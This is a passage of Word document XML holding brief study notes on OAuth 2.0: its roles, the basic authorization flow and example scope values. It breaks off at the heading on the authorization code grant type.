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1676" w14:textId="07CD48DD" w:rsidR="007A23E9" w:rsidRPr="008026BD" w:rsidRDefault="007A23E9" w:rsidP="00B9084F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>What is OAuth?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2E15B2" w14:textId="3C336B51" w:rsidR="0044057A" w:rsidRPr="008026BD" w:rsidRDefault="00AF4E2A" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OAuth</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007A23E9" w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">helps </w:t>
      </w:r>
      <w:r w:rsidR="0044057A" w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>user grant limited access without exposing the credential to the requesting application (e.g., login using social media account)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697AA512" w14:textId="45D256F9" w:rsidR="0044057A" w:rsidRPr="008026BD" w:rsidRDefault="0044057A" w:rsidP="00B9084F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:num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b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Client application</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00683566" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> The</w:t>
      </w:r>
      <w:r w:rsidR="00683566" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">web </w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>application</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> that wants to access the user's data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211B86E6" w14:textId="5B3B15B9" w:rsidR="0044057A" w:rsidRPr="008026BD" w:rsidRDefault="0044057A" w:rsidP="00B9084F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:num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b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Resource owner</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> - The </w:t>
      </w:r>
      <w:r w:rsidR="00683566" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">owner </w:t>
      </w:r>
      <w:r w:rsidR="00683566" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>of the data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569CD72D" w14:textId="668945F7" w:rsidR="00DF644B" w:rsidRPr="008026BD" w:rsidRDefault="0044057A" w:rsidP="00B9084F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:num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b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>OAuth service provider</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t> - provid</w:t>
      </w:r>
      <w:r w:rsidR="007A23E9" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> an </w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> for interacting with an </w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>authorization server</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> and a </w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>resource server</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4E12E9" w14:textId="23A66917" w:rsidR="007A23E9" w:rsidRPr="008026BD" w:rsidRDefault="007A23E9" w:rsidP="00B9084F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>How does OAuth 2.0 work?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A863571" w14:textId="3AE642DF" w:rsidR="00DF644B" w:rsidRPr="008026BD" w:rsidRDefault="00DF644B" w:rsidP="00B9084F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:num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b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Client application</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> requests access to user's data</w:t>
      </w:r>
      <w:r w:rsidR="00D06A6F" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D06A6F" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>(authorization request)</w:t>
      </w:r>
      <w:r w:rsidR="00D06A6F" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BD003A" w14:textId="4E9EA27F" w:rsidR="00DF644B" w:rsidRPr="008026BD" w:rsidRDefault="00DF644B" w:rsidP="00B9084F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:num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b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>User</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> log</w:t>
      </w:r>
      <w:r w:rsidR="007A23E9" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>in to the OAuth service</w:t>
      </w:r>
      <w:r w:rsidR="007A23E9" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>give</w:t>
      </w:r>
      <w:r w:rsidR="007A23E9" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> consent for the requested access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BE7230" w14:textId="36CCB77B" w:rsidR="00DF644B" w:rsidRPr="008026BD" w:rsidRDefault="00DF644B" w:rsidP="00B9084F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:num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b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Client application</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> receives a unique </w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>access token</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EB30D3" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690D17FF" w14:textId="7CBA16E0" w:rsidR="00D06A6F" w:rsidRPr="008026BD" w:rsidRDefault="00DF644B" w:rsidP="00B9084F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:num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b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Client application</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> uses this access token to fetch the data from resource server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F9F02C" w14:textId="053254B1" w:rsidR="00EB30D3" w:rsidRPr="008026BD" w:rsidRDefault="00EB30D3" w:rsidP="00B9084F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">OAuth scope </w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>specifies which data the client application wants to access and what kind of operations it wants to perform</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4D771A" w14:textId="53E386F7" w:rsidR="00D06A6F" w:rsidRPr="008026BD" w:rsidRDefault="00EB30D3" w:rsidP="00B9084F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00D06A6F" w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ead the user’s contact list</w:t>
      </w:r>
      <w:r w:rsidR="008C41DB" w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00D06A6F" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>scope=contacts</w:t>
      </w:r>
      <w:r w:rsidR="008C41DB" w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r w:rsidR="00D06A6F" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>scope=contacts.read</w:t>
      </w:r>
      <w:r w:rsidR="008C41DB" w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r w:rsidR="00D06A6F" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>scope=contact-list-r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AFDF20" w14:textId="50091ECA" w:rsidR="00D06A6F" w:rsidRPr="008026BD" w:rsidRDefault="00D06A6F" w:rsidP="00B9084F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>scope=https://oauth-authorization-server.com/auth/scopes/user/contacts.readonly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4B4BE3" w14:textId="353A2CDB" w:rsidR="00EF6C6C" w:rsidRPr="008026BD" w:rsidRDefault="00EB30D3" w:rsidP="00B9084F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00EF6C6C" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>uthentication</w:t>
      </w:r>
      <w:r w:rsidR="008C41DB" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00EF6C6C" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>scope=openid profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6239357E" w14:textId="77777777" w:rsidR="00EB30D3" w:rsidRPr="008026BD" w:rsidRDefault="00EB30D3" w:rsidP="00B9084F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Authorization code grant type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB605C1" w14:textId="3169089A" w:rsidR="00EF6C6C" w:rsidRPr="008026BD" w:rsidRDefault="008533C1" w:rsidP="00B9084F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:drawing>
